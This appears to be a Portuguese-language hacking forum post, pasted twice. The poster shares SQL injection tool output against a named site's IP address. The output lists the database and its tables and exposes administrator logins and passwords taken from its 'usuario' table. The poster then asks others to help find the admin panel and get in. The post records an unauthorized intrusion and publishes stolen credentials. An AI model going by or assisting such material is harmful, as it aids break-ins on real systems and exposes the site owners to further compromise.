olha eu achei tudo mais nao to conseguindo achar a area de administraçao principal
olhas os codigos SQL Aançado
Host IP: 189.113.2.178
Web Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2
mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_bwlimited/1.4
Powered-by: PHP/5.2.17
Keyword Found: ABRIDOR
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 16
Finding string column
Valid String Column is 3
Target Vulnerable
Current DB: maquira_site
Count(table_name) of information_schema.tables Where table_schema=0x6D6171756972615F73697465 is 20
Tables found: cases,cases_foto,categoria_cases,categoria_pesquis a,certificados,depoimentos,lancamentos,lista_news, noticias,noticias_foto,pesquisas,produto,produto_c ategorias,produto_downloads,produto_informacoes,pr oduto_passoapasso,produto_perguntas_frequentes,pro duto_subprodutos,usuario,videos
Count(column_name) of information_schema.columns Where table_schema=0x6D6171756972615F73697465 AND table_name=0x7573756172696F is 2
Columns found: login,senha
Count(*) of maquira_site.usuario is 2
Data Found: login=maquira
I got bored of waiting more than 60 seconds! (request timed out)
Turning off 'bypass illegal union' and retrying!
Data Found: senha=maquira
Data Found: login=olivermedia
Data Found: senha=real
-------------------------------
E aqui as paginas que eu encontrei no exploit
Page Found: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Page Found: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Page Found: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Mais nenhuma da acesso com o login e a senha que eu pegei e agora?
podem me ajudar
olhas os codigos SQL Aançado
Host IP: 189.113.2.178
Web Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2
mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_bwlimited/1.4
Powered-by: PHP/5.2.17
Keyword Found: ABRIDOR
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 16
Finding string column
Valid String Column is 3
Target Vulnerable
Current DB: maquira_site
Count(table_name) of information_schema.tables Where table_schema=0x6D6171756972615F73697465 is 20
Tables found: cases,cases_foto,categoria_cases,categoria_pesquis a,certificados,depoimentos,lancamentos,lista_news, noticias,noticias_foto,pesquisas,produto,produto_c ategorias,produto_downloads,produto_informacoes,pr oduto_passoapasso,produto_perguntas_frequentes,pro duto_subprodutos,usuario,videos
Count(column_name) of information_schema.columns Where table_schema=0x6D6171756972615F73697465 AND table_name=0x7573756172696F is 2
Columns found: login,senha
Count(*) of maquira_site.usuario is 2
Data Found: login=maquira
I got bored of waiting more than 60 seconds! (request timed out)
Turning off 'bypass illegal union' and retrying!
Data Found: senha=maquira
Data Found: login=olivermedia
Data Found: senha=real
-------------------------------
E aqui as paginas que eu encontrei no exploit
Page Found: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Page Found: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Page Found: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Mais nenhuma da acesso com o login e a senha que eu pegei e agora?
podem me ajudar
Comment